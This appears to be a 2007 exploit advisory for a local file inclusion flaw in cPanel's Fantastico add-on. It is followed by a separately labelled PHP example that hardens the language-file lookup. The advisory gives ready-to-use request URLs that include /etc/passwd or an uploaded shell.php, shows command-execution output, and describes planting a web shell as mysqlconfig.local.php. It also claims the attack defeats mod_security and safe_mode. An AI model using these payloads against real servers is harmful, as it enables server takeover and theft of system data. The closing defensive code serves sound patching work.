Fantastico In all Version Cpanel 10.x <= local File Include

2007.03.19
Credit: cyb3rt & 020
Risk: Medium
Local: Yes
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

##############################################################
Fantastico In all Version Cpanel 10.x <= local File Include
##############################################################

Note: This works with the default php.ini settings in cPanel, and also on all web servers.
You must have a username and password and be logged in on :2082.
It gets past the strongest protections: mod_security & safe_mode:On & Disable functions : All NONE

Vulnerable Code ( 1 ) :

    if(is_file($userlanguage))
    {
    include ( $userlanguage );

In http://xx.com:2082/frontend/x/fantastico/includes/load_language.php

Exploit 1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

    id
    uid=32170(user) gid=32170(user) groups=32170(user)

Exploit 2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

###################################################

Vulnerable Code ( 2 ) :

    $localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
    if (is_file($localmysqlconfig))
    {
    include($localmysqlconfig);

in http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
And also many of the other files of the program.

Exploit :
First create a directory named (/includes/) and upload Shell.php into (/includes/), then rename it to mysqlconfig.local.php D:

:::xploit::::
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/

###################################################
Discovered By : cyb3rt & 020
###################################################
Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team
###################################################
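
A hardened form of the lookup in Vulnerable Code ( 1 ), as an added example that is not Fantastico's code or part of the original advisory: the request value is treated as a language name matched against a strict pattern, and the include path is built and canonicalised server-side. The function name, the one-file-per-language directory layout and the demo files are assumptions.

```php
<?php
// Added example, not Fantastico code. resolve_language_file() and the
// one-file-per-language directory layout are assumptions.
function resolve_language_file(string $langDir, $requested, string $default = 'english'): string
{
    // 1. Accept only a short identifier; anything path-like falls back to the default.
    if (!is_string($requested) || !preg_match('/\A[a-z_]{1,32}\z/', $requested)) {
        $requested = $default;
    }
    // 2. Build the path server-side and canonicalise it.
    $base = realpath($langDir);
    if ($base === false) {
        throw new RuntimeException('language directory missing');
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested . '.php');
    // 3. The canonical path must sit directly inside the base directory
    //    (rejects unknown names and symlinks that point elsewhere).
    if ($path === false || dirname($path) !== $base || !is_file($path)) {
        $path = realpath($base . DIRECTORY_SEPARATOR . $default . '.php');
        if ($path === false || dirname($path) !== $base) {
            throw new RuntimeException('default language file missing');
        }
    }
    return $path;
}

// Constructed demo data: a temporary language directory with two files.
$dir = sys_get_temp_dir() . '/lang_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/english.php", "<?php return ['hello' => 'Hello'];");
file_put_contents("$dir/german.php", "<?php return ['hello' => 'Hallo'];");

// One valid name, the two path values from the advisory's requests,
// a non-string value and an unknown name: all but the first get the default.
$inputs = ['german', '/etc/passwd', '/home/user/shell.php', ['x'], 'klingon'];
foreach ($inputs as $in) {
    $file = resolve_language_file($dir, $in);
    $strings = include $file;   // path was built here, not taken from the request
    printf("%-26s -> %s (%s)\n", json_encode($in, JSON_UNESCAPED_SLASHES),
        basename($file), $strings['hello']);
}
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

The same rule covers Vulnerable Code ( 2 ): the base directory is fixed by the script itself (for example `__DIR__`) and is never a variable a request can set.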

